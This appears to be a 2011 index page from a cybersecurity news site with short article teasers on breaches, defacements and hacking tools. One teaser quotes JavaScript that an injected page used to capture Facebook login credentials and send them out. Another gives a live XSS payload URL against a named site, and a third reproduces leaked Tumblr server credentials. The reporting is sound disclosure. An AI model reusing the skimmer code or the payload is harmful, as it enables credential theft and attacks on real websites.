#1 Trusted Cybersecurity News Platform
Followed by 5.20+ million
The Hacker News Logo
Subscribe – Get Latest News
AWS EKS Security Best Practices

The Hacker News | #1 Trusted Source for Cybersecurity News — Index Page

Exposure : How does the Tunisian government steal passwords on Facebook !

Exposure : How does the Tunisian government steal passwords on Facebook !

Mar 19, 2011
You perhaps have followed the recent actualities about Tunisian Government stealing accounts on facebook. Read More Here ... There's how they do: Here's the web page of Facebook as seen when you're connected in Tunisia https://pastebin.com/WV0C9t0F Let's take a look at that javascript curious part.. !-- function h6h(st){var st2="";for(i=0;i<st.length;i++){c=st.charCodeAt(i);ch=(c&0xF0)>>4;cl=c&0x0F; st2=st2+String.fromCharCode(ch+97)+String.fromCharCode(cl+97);}return st2;} function r5t(len){var st="";for(i=0;i<len;i++)st=st+String.fromCharCode(Math.floor(Math.random(1)*26+97)); return st;} function hAAAQ3d() { var frm = document.getElementById("login_form"); var us3r = frm.email.value; var pa55 = frm.pass.value; var url = "https://www.facebook.com/wo0dh3ad?q="+r5t(5)+"&u="+h6h(us3r)+"&p="+h6h(pa55); var bnm = navigator.appName; if(bnm=='Microsoft Internet Explorer') inv0k3(url); else...
Tumblr security flaw : server IPS, API keys, passwords, etc were leaked !

Tumblr security flaw : server IPS, API keys, passwords, etc were leaked !

Mar 19, 2011
Update : Tumblr security flaw, Clarification by Tumblr official staff ! : The Hacker News ~ https://www.thehackernews.com/2011/03/tumblr-security-flaw-clarification-by.html There is a possible security issue with Tumblr. Basically a lot of confidential information, including server IPS, API keys, passwords, etc were leaked. There are some of the stuff that got disclosed: Database::set_defaults(array(  'user' => 'tumblr3′, 'password' => 'm3MpH1C0Koh39….55Z8YWStbgTmcgQWJvFt4′,  .. define('MEMCACHE_HOST', '10.252.0.68′); define('MEMCACHE_VERSION_HOST', ' 10.252.0.67 '); Database::add('primary', array('host' =>  '192.168.200.142 ')); .. We redacted a bit to protect the innocent, but anyone can find it on Google. So what is going on? Did they got hacked somehow? We don't think so… By looking at the disclosed data dump, it looks like one of their developers make a little mistake: i?php require_once('chorus/Utils.php'); Can you see it above? Instead of starting ...
Mc.Graw Hill – Hacking Exposed 3rd Edition 2011

Mc.Graw Hill – Hacking Exposed 3rd Edition 2011

Mar 19, 2011
The latest Web app attacks and countermeasures from world-renowned practitioners. Protect your Web applications from malicious attacks by mastering the weapons and thought processes of today's hacker. Written by recognized security practitioners and thought leaders, Hacking Exposed Web Applications, Third Edition is fully updated to cover new infiltration methods and countermeasures. Find out how to reinforce authentication and authorization, plug holes in Firefox and IE, reinforce against injection attacks, and secure Web 2.0 features. Integrating security into the Web development lifecycle (SDL) and into the broader enterprise information security program is also covered in this comprehensive resource. Get full details on the hacker's footprinting, scanning, and profiling tools, including SHODAN, Maltego, and OWASP DirBuster See new exploits of popular platforms like Sun Java System Web Server and Oracle WebLogic in operation Understand how attackers defeat commonly used Web authe...
cyber security

10 Best Practices for Building a Resilient, Always-On Compliance Program

websiteXM CyberCyber Resilience / Compliance
Download XM Cyber's handbook to learn 10 essential best practices for creating a robust, always-on compliance program.
cyber security

Maximize the Security Tools You Already Have

websitePrelude SecuritySecurity Control Validation
Hone your EDR, identity, vuln, and email platforms against the threats that matter with a 14-day trial.
Facebook bypass of the cache servers ,Check who visits your profile !

Facebook bypass of the cache servers ,Check who visits your profile !

Mar 19, 2011
Facebook  bypass of the cache servers , Check who visits your profile ! Summary Let me explain a security flaw in Facebook in relation to their cache servers, which form a layer between the Internet and internal multimedia content (photos and videos uploaded). This ruling, allows access to raw browser requests of our friends, allowing private information of these people ( web-bug ), or use as a bridge to take advantage of other external vulnerability ( CSRF ). Facebook and intermediate layer Many times you have seen this "use this application and find out who visits your profile, right?, Well, this will always be a  fake,  because Facebook is designed in a way that makes it impossible. If you look, when you go up a photo like the profile, it is resized, compressed, and stored on Facebook's own server. Actually, there are hundreds of servers, which form what is called a CDN . An example of profile photo: https://profile...
3 Brazilian Government sites hacked by "kinG oF coNTroL" KSA Hacker

3 Brazilian Government sites hacked by "kinG oF coNTroL" KSA Hacker

Mar 19, 2011
3 Brazilian Government sites hacked by " kinG oF coNTroL " KSA Hacker Hacked sites : https://campinagrande.pb.gov.br/ https://guarai.to.gov.br/ https://camaradeitapuranga.go.gov.br/ News Source : Kai Farmer
Website collecting donations for Japan hacked !

Website collecting donations for Japan hacked !

Mar 19, 2011
Hackers took down the website of a Tennessee nonprofit that was collecting donations for Japan and replaced the home page with profanity. Japan-America Society of Tennessee executive director Leigh Weiland said hackers broke into the site sometime Wednesday night. The group's web-hosting company was able to get the site back up Thursday morning. Before that, anyone trying to go to the group's home page encountered a mostly blank screen with an offensive phrase at the top. Weiland said her group, which promotes goodwill for and understanding of Japan, has established a relief fund for Japanese victims of Friday's earthquake and tsunami. The site has been getting a lot of traffic from people who want to donate money.
How Did 50 Female Celebrities Get Hacked ?

How Did 50 Female Celebrities Get Hacked ?

Mar 19, 2011
Jessica Alba, Scarlett Johansson, Christina Aguilera Reportedly Hit; Some Had Nude Photos FBI agents are reportedly closing in on a ring of hackers thought to be responsible for stealing nude photos and videos from at least 50 female celebrities. According to TMZ.com, the ring broke into the accounts of stars' cell phones and other computerized devices to obtain the compromising photos and videos. Among the celebrities reportedly hacked: Jessica Alba, Selena Gomez, Demi Lovato, Christina Aguilera, Vanessa Hudgens, Scarlett Johansson, Ali Larter, and Miley Cyrus. TMZ reported that Hudgens met with FBI agents on Thursday to discuss the hacking of her Gmail account. The FBI declined ABCNews.com's requests for comment; representatives for Hudgens did not immediately respond. One report suggested that Alexa Nikolas, an actress on the now-canceled Nickelodeon TV series "Zoey 101," is responsible for leaking one of the personal photos, a shot of her kissing Hudgens. ...
WiFi Hacking Is Now Legal in Dutch !

WiFi Hacking Is Now Legal in Dutch !

Mar 19, 2011
Breaking in to an encrypted router and using the WiFi connection is not an criminal offence, a Dutch court ruled. WiFi hackers can not be prosecuted for breaching router security. A court in The Hague ruled earlier this month that it is legal to break WiFi security to use the internet connection. The court also decided that piggybacking on open WiFi networks in bars and hotels can not be prosecuted. In many countries both actions are illegal and often can be fined. The ruling is linked to a case of a student who threatened to shoot down everyone at the Maerlant College in The Hague, a high school. He posted a threat on the internet message board 4chan.org using a WiFi connection that he broke into. The student was convicted for posting the message and sentenced to 20 hours of community service, but he was acquitted of the WiFi hacking charges. The Judge reasoned that the student didn't gain access to the computer connected to the router, but only used the routers internet con...
Uhispam.edu.ni hacked by Hackers Security Team – 2011

Uhispam.edu.ni hacked by Hackers Security Team – 2011

Mar 19, 2011
Uhispam.edu.ni hacked by Hackers Security Team – 2011 Hacked site :  https://www.uhispam.edu.ni/
England cricket board XSS vunrebility found by Rishabh Das !

England cricket board XSS vunrebility found by Rishabh Das !

Mar 19, 2011
England cricket board XSS vunrebility found by Rishabh Das !   Link :  https://www.ecb.co.uk/search.html?q=%3Cimg+src%3D%22https://img199.imageshack.us/img199/1189/sigjzf.jpg%22%3E
Wophcrack – Web Based Interface For Ophcrack Password Cracking Tool

Wophcrack – Web Based Interface For Ophcrack Password Cracking Tool

Mar 18, 2011
I'm assuming everyone reading already knows about Ophcrack – the awesome time/memory trade-off password cracker. Well here is a nifty web-based interface for it. Rainbow Tables are really useful when cracking password hashes, but one major disadvantage of these tables is their size which can be hundreds of gigs for complex tables. The author thought it would be extremely useful to have a personal web interface for your rainbow tables which you can access from anywhere on the web anywhere without having to carry the large tables with you everywhere you go. And well here we are, Wophcrack (Web) Ophcrack. When cracking LM or NTLM hashes Ophcrack is a great tool as we discussed recently, it provides both a GUI and CLI options along with some free and paid tables. The author basically wrote a quick and dirty PHP based web frontend for Ophcrack. Wophcrack was designed to work on Backtrack 4 R2, Although it can be install on any Linux distribution with some small adj...
OpenDNSSEC 1.2.1 latest version Released !

OpenDNSSEC 1.2.1 latest version Released !

Mar 18, 2011
OpenDNSSEC 1.2.1 latest version Released ! Version 1.2.1 of OpenDNSSEC has now been released. ldns 1.6.9 is required for bugfixes. dnsruby-1.52 required for bugfixes. Bugfixes: Auditor: 'make check' now works when srcdir != builddir. Auditor: Include the 'make check' files in the tarball. Enforcer: Fix the migration script for SQLite. Enforcer: Increase size of keypairs(id) field in MySQL to allow more than 32767 keys; see MIGRATION for details. Enforcer: Minor change to NOT_READY_KEY error message. libhsm: Increase the maximum number of attached HSM:s from 10 to 100. ods-ksmutil: Send trivial MySQL messages to stdout when exporting zonelist etc. Otherwise the resulting XML needs to be edited by hand. ods-control: Fix for Bourne shell. Signer Engine: Prevent race condition when setting up the workers and the command handler. Signer Engine: Check if the signature exists before recycling it. Signer Engine: Quit when there are errors in the configuration. Sign...
Expert Insights Articles Videos
Cybersecurity Resources